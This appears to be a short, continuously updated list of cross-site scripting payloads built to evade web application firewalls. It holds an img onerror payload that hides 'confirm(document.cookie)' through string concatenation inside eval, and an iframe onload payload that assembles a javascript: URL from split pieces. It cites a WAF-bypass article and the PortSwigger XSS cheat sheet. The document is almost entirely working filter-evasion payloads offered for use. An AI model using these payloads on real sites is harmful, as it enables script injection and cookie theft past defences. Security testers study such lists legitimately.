This list will be updated continuously.
payload:
<img+src=x+onerror="eval('con'%20%2B'fi'%20%2B'rm(document.cookie)')">
Other payloads you can try yourself:
<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:con"+"fir"+"m()"';>
Original references:
https://hadess.io/waf-bypass-methods/
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet